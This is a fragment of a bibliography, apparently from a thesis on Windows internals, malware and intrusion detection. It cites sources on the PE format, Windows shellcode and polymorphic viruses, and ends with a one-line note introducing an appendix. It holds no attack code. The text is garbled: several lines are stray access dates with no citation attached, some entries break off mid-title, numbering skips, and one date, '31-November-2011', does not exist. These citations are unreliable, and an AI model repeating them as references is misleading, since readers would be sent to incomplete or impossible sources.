analysis. Digital Investigation, 7:S48–S56, 2010.
BIBLIOGRAPHY 123
27-September-2011].
[77] M.E. Russinovich, D.A. Solomon, and A. Ionescu. Microsoft Windows Internals:
Windows Server 2008 and Windows Vista. Microsoft Press Redmond, WA, 2009.
[78] J. Butler and K. Kendall. Blackout: What really happened. Black Hat USA,
2007, 2007.
07-May-2011].
31-November-2011].
August-2011].
[83] R. Chen. The Old New Thing: Practical Development Throughout the Evolution
[84] M. Pietrek. Peering Inside the PE: A Tour of the Win32 Portable Executable File
Format. http://msdn.microsoft.com/en-us/library/ms809762.aspx, 1994.
[85] Microsoft Developer Network. An In-Depth Look into the Win32 Portable
[87] sk. History and Advances in Windows Shellcode. Volume 0xXX, Issue 0x3e,
Phile# 0x07 of 0x10-Phrack Magazine, 2004.
[89] Y. Bai and H. Kobayashi. Intrusion detection system: Technology and develop-
ment. 2003.
[90] Microsoft Developer Network. Exercising the firewall using C++. http:
//msdn.microsoft.com/en-us/site/aa364726, 2010. [Online; accessed 15-
August-2011].
[93] X. Li, P.K.K. Loh, and F. Tan. Mechanisms of polymorphic and metamorphic
viruses. In Intelligence and Security Informatics Conference (EISIC), 2011 Eu-
Appendix A
All tables are reconstructed based on data acquired using WinDbg and the associated
SDK [73].